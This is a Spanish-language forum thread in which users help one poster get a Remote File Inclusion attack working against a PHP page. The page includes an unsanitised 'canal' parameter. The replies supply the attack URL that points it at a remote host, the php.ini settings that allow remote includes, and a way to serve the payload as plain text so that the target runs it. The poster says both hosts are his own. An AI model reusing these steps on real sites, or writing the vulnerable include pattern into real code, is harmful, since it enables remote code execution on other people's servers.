Ayuda con un RFI

Iniciado por dimitrix, 9 Abril 2007, 22:32 PM

0 Miembros y 3 Visitantes están viendo este tema.

dimitrix

Haber, mi intencion es hacerme un RFI (Remote File incluse) a esta dirección:
http://dimitrix.webcindario.com/prueba/index.php

el codigo del index.php es:

<p>Esta web es inCrackeable</p>
<?php
include("$canal.php")
?>


y le quiero hacer un include con este archivo:
http://www.dimitrix.es/canal.php/ que tiene de codigo esto:
<html>

<?php
$fp 
fopen("archivo.txt","w+");
fclose($fp);
?>


con esto conseguiri crear un archivo llamado archivo.txt en
http://dimitrix.webcindario.com/prueba/

yo lo hago de la siguiente forma:
http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.php

pero como que no me va y me da error, como seria¿?

no es nada ilegal ya q los housting son mios.
Gracias.




Zinc


dimitrix

no por que si te fijas el include pide el archivo canal.php




alone-in-the-chat

Prueba kitandole el ".php"
del final
ademas debes de tener habilitado global register en ON al igual que allow_url_fopen si no no funcionara



http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal



saludos
Because maybe
You're gonna be the one that saves me
And after all
You're my wonderwall
d[n_n]b

dimitrix

haber para para lo que me has dixo de register ON allow_url:fopen...

seria crear un php.ini y que dentro tenga esto ¿?

register_globals = on
allow_url_fopen = on


Quedaria así ¿?




alone-in-the-chat

Because maybe
You're gonna be the one that saves me
And after all
You're my wonderwall
d[n_n]b

Azielito

Ponelo asi
<p>Esta web es inCrackeable</p>
<?php
$canal 
$_GET['canal'];
include(
"$canal".".php")
?>

y entonces haces
index.php?canal=http://www.dimitrix.es/canal

dimitrix

nada de nada, pero gracias a todos.




Universal SAC

<p>Esta web es inCrackeable</p>
<?php
$canal 
$_GET['canal'];
include(
"$canal".".php")
?>


Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).

Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.
~UNIVERSAL[HACK]

yeikos

#9
Cita de: Zinc en 10 Abril 2007, 03:10 AM
La shell no deberia ser, un archivo de texto?.  :o

http://dimitrix.webcindario.com/prueba/index.php?canal=http://www.dimitrix.es/canal.txt ????????

Saludos!!

Cita de: Universal SAC en 22 Abril 2007, 20:37 PM
Aquí podemos incluir cualquier archivo SI y SOLO SI la extensión es .php (esto ya es una restricción). Por lo que si tratamos de incluir un fichero remoto no servirá de nada... (el código será interpretado en el servidor remoto. Es como si le dijeramos a "dimitrix.webcinario" que haga GET http://www.dimitrix.es/canal.php).

Por lo que en este caso tan específico, lo mejor que podemos hacer es incluir archivos .php encontrados en el mismo servidor... tratando de provocar errores y obtener información.


Os equivocais, mientras el código se encuentre en texto plano no habrá ningún problema...


<?php
echo "<?php
\$fp = fopen(\"archivo.txt\",\"w+\");
fclose(\$fp);
?>
";
?>


allow_url_include = On